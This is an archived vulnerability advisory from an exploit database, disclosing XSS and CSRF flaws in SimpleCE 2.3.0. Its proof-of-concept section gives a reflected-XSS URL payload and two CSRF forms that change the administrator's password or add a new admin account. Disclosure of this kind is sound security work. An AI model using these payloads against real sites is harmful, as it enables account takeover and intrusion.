exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

SimpleCE 2.3.0 Cross Site Request Forgery / Cross Site Scripting

SimpleCE 2.3.0 Cross Site Request Forgery / Cross Site Scripting
Posted Jun 15, 2017
Authored by 8bitsec

SimpleCE version 2.3.0 suffers from cross site request forgery and cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss, csrf
SHA-256 | 73f4dbf9aae73e9ed6bd6b715bc4d53973e9ebf611084b48d09ebacdb37362f4

SimpleCE 2.3.0 Cross Site Request Forgery / Cross Site Scripting

Change Mirror Download
# Exploit Title: SimpleCE 2.3.0 - Multiple Vulnerabilities XSS CSRF
# Date: 2017-06-14
# Exploit Author: 8bitsec
# Vendor Homepage: http://simplece.com
# Software Link: https://codecanyon.net/item/simplece-v2-mini-cms/9140868
# Version: 2.3.0, probably older versions
# Tested on: [Kali Linux 2.0 | Mac OS 10.12.5]
# Email: contact@8bitsec.io
# Contact: https://twitter.com/_8bitsec

Release Date:
=============
2017-06-14


Product & Service Introduction:
===============================
SimpleCE is a simple Content-Management System with front-end editor mode.

Vulnerability Disclosure Timeline:
==================================
2017-06-13: Vulnerability found.
2017-06-13: Reported to vendor.
2017-06-14: No answer.
2017-06-14: Published.


Technical Details & Description:
================================

Authenticated XSS vulnerability found on http://[server]/[path]/index.php/content/text/1?return_url=[XSS] exploitable as a regular or admin user.
CSRF vulnerability can be exploited to add an administrator or change its info including password.

Proof of Concept (PoC):
=======================

XSS:

http://[server]/[path]/index.php/content/text/1?return_url=<svg/onload=alert(/8bitsec/)>

CSRF:

Modify User:

<form action="http://[server]/[path]/index.php/user/1" autocomplete="off" method="post" accept-charset="utf-8">
<label>Username<input type="text" name="username" id="username" placeholder="Username" value="admin" required="required" /></label>
<label>Email<input type="email" name="email" id="email" placeholder="Email" value="mail@example.com" required="required" /></label>
<label>Firstname<input type="text" name="firstname" id="firstname" placeholder="Firstname" value="John" /></label>
<label>Surname<input type="text" name="surname" id="surname" placeholder="Surname" value="Doe" /></label>
<label>Password<input type="password" name="password" id="password" placeholder="Password" /></label>
<label>Password (repeat)<input type="password" name="password2" id="password2" placeholder="Password (repeat)"/></label>
<button type="submit" name="save" id="save" value="save">save</button>
</form>

Add User:

<form action="http://[server]/[path]/index.php/user/new" autocomplete="off" method="post" accept-charset="utf-8">
<label>Username<input type="text" name="username" id="username" placeholder="Username" value="adminuser" required="required" /></label>
<label>Email<input type="email" name="email" id="email" placeholder="Email" value="a@b.com" required="required" />
<label>Firstname<input type="text" name="firstname" id="firstname" placeholder="Firstname" value="admin" />
<label>Surname<input type="text" name="surname" id="surname" placeholder="Surname" value="user" /></label>
<label>Password<input type="password" name="password" id="password" placeholder="Password" required="required" /></label>
<label>Password (repeat)<input type="password" name="password2" id="password2" placeholder="Password (repeat)" required="required" /></label>
<label for="group">Role<select name="group" id="group" required="required">
<option value="2" >User</option>
<option value="1" selected="selected">Admin</option>
</select>
</label>
<button type="submit" name="save" id="save" value="save">save</button>
</form>


Credits & Authors:
==================
8bitsec - [https://twitter.com/_8bitsec]
Login or Register to add favorites

File Archive:

June 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    0 Files
  • 2
    Jun 2nd
    0 Files
  • 3
    Jun 3rd
    18 Files
  • 4
    Jun 4th
    21 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    57 Files
  • 7
    Jun 7th
    0 Files
  • 8
    Jun 8th
    0 Files
  • 9
    Jun 9th
    0 Files
  • 10
    Jun 10th
    0 Files
  • 11
    Jun 11th
    0 Files
  • 12
    Jun 12th
    0 Files
  • 13
    Jun 13th
    0 Files
  • 14
    Jun 14th
    0 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    0 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    0 Files
  • 20
    Jun 20th
    0 Files
  • 21
    Jun 21st
    0 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close